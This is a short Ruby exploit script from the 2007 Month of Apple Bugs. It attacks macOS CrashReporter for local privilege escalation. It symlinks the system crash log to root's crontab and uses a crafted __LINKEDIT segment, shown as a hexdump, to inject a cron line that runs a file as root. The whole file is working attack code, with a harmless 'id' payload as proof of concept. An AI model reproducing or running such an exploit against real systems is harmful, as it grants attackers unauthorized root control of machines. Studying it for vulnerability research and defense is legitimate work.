MOAB-28-01-2007.rb.txt

`#!/usr/bin/ruby  
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>  
# Lance M. Havok <lmh [at] info-pull.com>  
# All pwnage reserved.  
#  
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter  
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log  
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output   
#  
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..  
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 [email protected]..  
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............  
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................  
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...  
# 0000370: 0c00 0000 3400 0000 1800 0000 68b7 9b45 ....4.......h..E  
# 0000380: 0403 5800 0000 0100 0d0a 2a20 2a20 2a20 ..X.......* * *   
# 0000390: 2a20 2a20 2f74 6d70 2f78 0d0a 2e64 796c * * /tmp/x...dyl  
# 00003a0: 6962 0000 0200 0000 1800 0000 0030 0000 ib...........0..  
#  
# 4) Run the fake program which will crash and create /var/cron/tabs/root  
# 5) Sleep and then create a legit crontab to refresh cron  
  
SYMLINK_PATH = "/Library/Logs/CrashReporter/vuln.crash.log"  
  
PWNERCYCLE = "ln -s /var/cron/tabs/root #{SYMLINK_PATH};" +  
"chmod 000 ~/Library/Logs/CrashReporter/;" +  
"crontab /tmp/fakecron;" +  
"chmod +x /Users/Shared/r00t; sleep 61; ./vuln;"  
  
def escalate()  
puts "++ Fixing up a fake crontab"  
fakecron = File.new("/tmp/fakecron", "w")  
fakecron.print("* * * * * /usr/bin/id > /tmp/USERCRON\n")  
fakecron.close  
tmp_ex = File.new("/Users/Shared/r00t", "w")  
tmp_ex.print("/usr/bin/id > /tmp/CRASHREPOWNED\n")  
tmp_ex.close  
  
system PWNERCYCLE  
end  
  
escalate()  
  
`